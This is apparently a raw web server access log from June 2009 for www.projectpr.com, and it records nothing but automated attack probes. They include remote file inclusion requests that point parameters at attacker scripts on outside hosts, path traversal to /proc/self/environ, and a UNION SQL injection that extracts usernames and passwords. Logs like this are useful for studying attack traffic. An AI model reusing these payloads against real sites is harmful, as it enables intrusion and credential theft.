85.214.37.11 - - [12/Jun/2009:05:28:42 -0700] "GET /logs/access_070812.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
222.122.160.145 - - [12/Jun/2009:05:30:10 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.projectpr.com"
222.122.160.145 - - [12/Jun/2009:05:30:10 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:05:30:44 -0700] "GET /logs/access_071012.log//newspublish/include.php?path%5Bdocroot%5D=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:05:30:45 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:05:30:45 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:05:30:47 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:05:30:48 -0700] "GET /logs/access_071012.log//newspublish/include.php?path%5Bdocroot%5D=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
85.214.37.11 - - [12/Jun/2009:05:31:03 -0700] "GET /logs/access_070812.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://haar13.com//components/com_dat/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
59.24.49.35 - - [12/Jun/2009:05:31:36 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
59.24.49.35 - - [12/Jun/2009:05:31:36 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
59.24.49.35 - - [12/Jun/2009:05:31:36 -0700] "GET /logs/access_070912.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
59.24.49.35 - - [12/Jun/2009:05:31:46 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
59.24.49.35 - - [12/Jun/2009:05:31:46 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
59.24.49.35 - - [12/Jun/2009:05:31:46 -0700] "GET /logs/access_070912.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
59.24.49.35 - - [12/Jun/2009:05:33:27 -0700] "GET /logs/access_070912.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:05:33:44 -0700] "GET /logs/access_071012.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:05:33:51 -0700] "GET /logs/access_071012.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
59.24.49.35 - - [12/Jun/2009:05:35:09 -0700] "GET /logs/access_070912.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
222.122.160.145 - - [12/Jun/2009:05:37:54 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.projectpr.com"
222.122.160.145 - - [12/Jun/2009:05:37:55 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:05:38:10 -0700] "GET /logs/access_070912.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:05:38:18 -0700] "GET /logs/access_070912.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
124.0.146.100 - - [12/Jun/2009:05:38:53 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
124.0.146.100 - - [12/Jun/2009:05:38:53 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
124.0.146.100 - - [12/Jun/2009:05:38:53 -0700] "GET /logs/access_070812.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
124.0.146.100 - - [12/Jun/2009:05:39:37 -0700] "GET /logs/access_071012.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
85.17.156.17 - - [12/Jun/2009:05:44:20 -0700] "GET /logs/access_071212.log/index.php?pagina=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.projectpr.com"
85.17.156.17 - - [12/Jun/2009:05:44:20 -0700] "GET /logs/index.php?pagina=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.projectpr.com"
85.17.156.17 - - [12/Jun/2009:05:44:21 -0700] "GET /index.php?pagina=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:05:45:37 -0700] "GET /logs/access_070912.log//newspublish/include.php?path%5Bdocroot%5D=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
61.106.21.32 - - [12/Jun/2009:05:46:39 -0700] "GET /logs/access_070912.log//newspublish/include.php?path%5Bdocroot%5D=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
118.129.166.10 - - [12/Jun/2009:05:48:53 -0700] "GET /?prefix=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 9405 "-" "Mozilla/5.0" "www.projectpr.com"
118.129.166.10 - - [12/Jun/2009:05:49:05 -0700] "GET /logs//?prefix=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 6806 "-" "Mozilla/5.0" "www.projectpr.com"
118.129.166.10 - - [12/Jun/2009:05:50:04 -0700] "GET /logs/access_071012.log%20%20//?prefix=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:05:51:24 -0700] "GET /logs/access_071112.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.cjmc.or.kr//data/climb_gallery/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:05:51:24 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.cjmc.or.kr//data/climb_gallery/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:05:51:24 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.cjmc.or.kr//data/climb_gallery/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
118.129.166.10 - - [12/Jun/2009:05:52:12 -0700] "GET /logs/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
118.129.166.10 - - [12/Jun/2009:05:52:12 -0700] "GET /errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
118.129.166.10 - - [12/Jun/2009:05:52:12 -0700] "GET /logs/access_070812.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
118.129.166.10 - - [12/Jun/2009:05:53:31 -0700] "GET /errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
118.129.166.10 - - [12/Jun/2009:05:53:31 -0700] "GET /logs/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
118.129.166.10 - - [12/Jun/2009:05:53:31 -0700] "GET /logs/access_070812.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:05:53:45 -0700] "GET /logs/access_070912.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.cjmc.or.kr//data/climb_gallery/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
118.129.166.10 - - [12/Jun/2009:05:54:31 -0700] "GET /logs/access_071212.log/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
118.129.166.10 - - [12/Jun/2009:06:00:56 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
118.129.166.10 - - [12/Jun/2009:06:00:56 -0700] "GET /logs/access_070812.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
118.129.166.10 - - [12/Jun/2009:06:00:59 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.8.66.19 - - [12/Jun/2009:06:05:07 -0700] "GET /logs/access_070812.log//components/com_smf/smf.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.8.66.19 - - [12/Jun/2009:06:05:07 -0700] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.8.66.19 - - [12/Jun/2009:06:05:07 -0700] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.8.66.19 - - [12/Jun/2009:06:06:34 -0700] "GET /logs/access_070812.log//components/com_smf/smf.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.8.66.19 - - [12/Jun/2009:06:06:34 -0700] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.8.66.19 - - [12/Jun/2009:06:06:37 -0700] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
118.129.166.10 - - [12/Jun/2009:06:08:15 -0700] "GET /logs/access_070812.log//?prefix=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
118.129.166.10 - - [12/Jun/2009:06:08:20 -0700] "GET /logs/access_071012.log//?prefix=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:06:11:05 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:06:11:05 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:06:11:05 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:06:11:18 -0700] "GET /logs/access_071012.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:06:13:51 -0700] "GET /logs/access_070912.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:06:13:51 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:06:13:51 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:06:13:52 -0700] "GET /logs/access_070912.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:06:13:52 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:06:13:52 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:06:14:00 -0700] "GET /logs/access_071012.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.38.54.140 - - [12/Jun/2009:06:14:00 -0700] "GET /logs/access_071012.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fzv.uni-mb.si/page/components/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
85.17.156.17 - - [12/Jun/2009:06:14:50 -0700] "GET /logs/index.php?include=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.projectpr.com"
85.17.156.17 - - [12/Jun/2009:06:14:50 -0700] "GET /index.php?include=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.projectpr.com"
85.17.156.17 - - [12/Jun/2009:06:14:50 -0700] "GET /logs/access_071012.log/index.php?include=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.projectpr.com"
66.11.230.36 - - [12/Jun/2009:06:25:40 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/bsid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.11.230.36 - - [12/Jun/2009:06:25:40 -0700] "GET /logs/access_070912.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/bsid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.11.230.36 - - [12/Jun/2009:06:25:40 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/bsid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.11.230.36 - - [12/Jun/2009:06:26:18 -0700] "GET /logs/access_071012.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/bsid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.11.230.36 - - [12/Jun/2009:06:27:07 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/bsid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.11.230.36 - - [12/Jun/2009:06:27:07 -0700] "GET /logs/access_070912.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/bsid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.11.230.36 - - [12/Jun/2009:06:27:10 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.scoringsessions.com///img/large/bsid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:06:27:27 -0700] "GET /logs/access_070912.log//include/write.php?dir=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:06:27:30 -0700] "GET /include/write.php?dir=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:06:27:31 -0700] "GET /logs//include/write.php?dir=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:06:30:33 -0700] "GET /logs/access_070912.log//include/write.php?dir=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:06:30:34 -0700] "GET /include/write.php?dir=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:06:30:35 -0700] "GET /logs//include/write.php?dir=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:06:39:27 -0700] "GET /logs/access_071212.log/?mosConfig_admin_path=http://www.cjmc.or.kr//data/climb_gallery/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:06:39:28 -0700] "GET /?mosConfig_admin_path=http://www.cjmc.or.kr//data/climb_gallery/idscan.txt?? HTTP/1.1" 200 9405 "-" "libwww-perl/5.808" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:06:39:31 -0700] "GET /logs/?mosConfig_admin_path=http://www.cjmc.or.kr//data/climb_gallery/idscan.txt?? HTTP/1.1" 200 6801 "-" "libwww-perl/5.808" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:06:39:46 -0700] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:06:39:46 -0700] "GET /modules/xfsection/modify.php?dir_module=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:06:40:28 -0700] "GET /logs/access_071112.log/?mosConfig_admin_path=http://www.cjmc.or.kr//data/climb_gallery/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
211.110.19.178 - - [12/Jun/2009:06:41:05 -0700] "GET /logs//index.php?option=com_remository&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
211.110.19.178 - - [12/Jun/2009:06:41:05 -0700] "GET /index.php?option=com_remository&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
211.110.19.178 - - [12/Jun/2009:06:41:08 -0700] "GET /logs/access_071112.log//index.php?option=com_remository&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
211.110.19.178 - - [12/Jun/2009:06:42:13 -0700] "GET /logs/access_071212.log//index.php?option=com_remository&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:06:43:53 -0700] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:06:43:54 -0700] "GET /modules/xfsection/modify.php?dir_module=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:06:43:55 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:06:45:24 -0700] "GET /logs/access_071012.log//include/write.php?dir=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:06:47:32 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cjmc.or.kr//data/climb_gallery/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:06:47:35 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cjmc.or.kr//data/climb_gallery/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:06:47:35 -0700] "GET /logs/access_071112.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cjmc.or.kr//data/climb_gallery/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:06:47:41 -0700] "GET /logs/access_071212.log//modules/xfsection/modify.php?dir_module=http://traipod.altervista.org/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:06:47:43 -0700] "GET /logs/access_071212.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cjmc.or.kr//data/climb_gallery/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:06:49:59 -0700] "GET /logs/access_071112.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cjmc.or.kr//data/climb_gallery/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [12/Jun/2009:06:49:59 -0700] "GET /logs/access_071212.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cjmc.or.kr//data/climb_gallery/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.19.247.39 - - [12/Jun/2009:06:51:15 -0700] "GET /logs/access_071212.log//modules/xfsection/modify.php?dir_module=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
